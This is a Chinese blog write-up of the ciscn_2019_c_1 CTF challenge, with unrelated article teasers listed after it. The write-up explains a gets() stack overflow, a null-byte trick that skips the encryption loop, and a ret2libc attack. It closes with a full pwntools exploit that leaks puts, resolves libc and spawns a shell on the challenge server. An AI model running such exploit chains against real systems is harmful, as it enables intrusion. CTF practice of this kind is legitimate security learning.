news 2026/7/7 16:54:27

PWN手的成长之路-14-ciscn_2019_c_1-ret2libc

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
PWN手的成长之路-14-ciscn_2019_c_1-ret2libc

查看 main 函数:

image

image

image

再结合程序的运行,我们输入的值存到了 v4 中,当 v4=2 时,程序重新再次执行 begin() 函数,若输入 3,则直接退出程序,只有当我们输入 1 的时候,程序才会调用 encrypt() 函数。

查看 encrypt() 函数。gets() 读取输入并进入循环,通过 strlen(s) 获取用户输入的字节长度并对字符进行一系列异或操作。

image

发现存在 gets() 高危函数,猜测存在栈溢出漏洞。但是这道题没有 system("/bin/sh"),并且文件开启了 NX 保护,因此 ret2shellcode、ret2text基本排除了,所以只能是 ret2libc。

ret2libc 是不直接注入 shellcode (因为程序通常具有 NX 保护,栈不可知执行),而是通过利用程序自身加载的动态链接库(比如 libc.so)中的函数(如 system()、execve()等)来执行任意的代码。

但是这道题并没有给出 libc.so 文件,并且程序自身也没有 system 函数和 "/bin/sh" 字符串,所以就需要先泄露程序中的函数地址,再查询 libc 版本,并找到 system 函数和 "/bin/sh" 字符串的内存地址。

再分析 encrypt() 函数,strlen 函数是一个C库中的函数,主要用于计算以空字符 “\0”

为结尾的字符串长度,它会从传入的字符串开始检查每一个字符,直到遇到 “\0” 为止,然后返回遇到的字符串个数(其中不包括 "\0" 本身),例如:给定字符串 “hello”,strlen 函数会返回5,但是如果在字符串开头加上 "\0",那么此时 strlen 函数就会返回0,例如:输入字符串 "\0hello",strlen 函数就会返回0,因为 strlen 函数的机制就是遇到 "\0" 就停止计数,在 encrypt() 函数的后续有说明当 v0>= strlen(s),但是由于 strlen 返回的就是0,所以 v0>=strlen(s) 为假,条件不成立则跳出循环,即跳过了 encrypt 函数对字符串进行异或操作的逻辑,以达到 “破坏” 加密流程的目的(目的就是不让他进行加密操作)。

因为函数没有 system 、/bin/sh,所以攻击会变得较为复杂步骤:

1、泄露libc函数地址(puts)

2、计算其他libc函数地址(system)

3、构造ROP链(/bin/sh)

具体流程:先泄露 puts 函数 plt,再泄露 puts 函数 got 表,栈溢出覆盖返回地址,控制流程使其跳转到 puts@plt,设置 put 参数的内存地址为 got(即泄露 puts 在内存中的实际地址),再返回 main 函数,为什么是 main 函数,因为需要返回到可以再次触发漏洞的攻击函数,方便二次攻击。

再得到puts的真实地址后,使用得到puts地址并结合ibc数据库匹配相对应的libc版本,再计算其他函数的偏移地址。

最终exp(调试了快两天才最终于2025/10/12/14:40成功):

from pwn import *

from LibcSearcher import *

#start

r = remote('node5.buuoj.cn',28626)

#r = process('./pwn')

elf = ELF('./pwn')

#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') #ldd pwn

context.log_level='debug'

#params

rdi_addr = 0x400C83

ret_addr = 0x4006b9

puts_plt = elf.plt['puts']

puts_got = elf.got['puts']

main_addr = elf.sym['main']

#attack

payload = b'a'*(0x50 + 8) + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

r.sendlineafter(b"choice",b'1')

r.sendline(payload)

puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

#puts_addr = u64(r.recvline()[:-1].ljust(8,b'\0'))

print(hex(puts_addr))

#libc

libc = LibcSearcher("puts",puts_addr)

base_addr = puts_addr - libc.dump('puts')

system_addr = base_addr + libc.dump('system')

bin_sh_addr = base_addr + libc.dump('str_bin_sh')

#base_addr = puts_addr - libc.symbols['puts']

#system_addr = base_addr + libc.symbols['system']

#bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))

#attack2

payload2 = b'a'*(0x50+8) + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) +p64(system_addr)

r.sendlineafter(b'choice',b'1')

r.recvuntil(b'encrypted')

r.sendline(payload2)

r.interactive()

参考1000x_师傅的文章。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/7 14:50:54

Segment Anything模型在工业质量检测中的技术实现与优化

Segment Anything模型在工业质量检测中的技术实现与优化 【免费下载链接】segment-anything The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example notebooks that s…

作者头像 李华
网站建设 2026/7/7 11:48:04

Ant Design输入组件深度解析:从基础应用到高级实战

Ant Design输入组件深度解析:从基础应用到高级实战 【免费下载链接】ant-design An enterprise-class UI design language and React UI library 项目地址: https://gitcode.com/GitHub_Trending/an/ant-design Ant Design作为企业级React UI组件库&#xff…

作者头像 李华
网站建设 2026/7/7 9:53:52

OpenVLA微调后推理失败?终极解决方案揭秘

OpenVLA微调后推理失败?终极解决方案揭秘 【免费下载链接】openvla OpenVLA: An open-source vision-language-action model for robotic manipulation. 项目地址: https://gitcode.com/gh_mirrors/op/openvla 在使用OpenVLA开源视觉语言动作模型进行自定义数…

作者头像 李华
网站建设 2026/7/7 12:03:25

联想拯救者BIOS隐藏选项深度解锁终极指南

联想拯救者BIOS隐藏选项深度解锁终极指南 【免费下载链接】LEGION_Y7000Series_Insyde_Advanced_Settings_Tools 支持一键修改 Insyde BIOS 隐藏选项的小工具,例如关闭CFG LOCK、修改DVMT等等 项目地址: https://gitcode.com/gh_mirrors/le/LEGION_Y7000Series_In…

作者头像 李华
网站建设 2026/7/7 9:24:50

Go-Ansible终极指南:在Golang中无缝集成Ansible的深度解析

为什么选择在Go应用中直接调用Ansible?当传统DevOps流程在微服务架构中显得笨重时,Go-Ansible提供了原生级的集成方案,让基础设施即代码的理念真正融入应用程序核心。 【免费下载链接】go-ansible Go-ansible is a Go package that enables t…

作者头像 李华
网站建设 2026/7/6 15:53:00

5分钟掌握CopyQ脚本编程:从入门到实战的完整指南

5分钟掌握CopyQ脚本编程:从入门到实战的完整指南 【免费下载链接】CopyQ hluk/CopyQ: CopyQ 是一个高级剪贴板管理器,具有强大的编辑和脚本功能,可以保存系统剪贴板的内容并在以后使用。 项目地址: https://gitcode.com/gh_mirrors/co/Copy…

作者头像 李华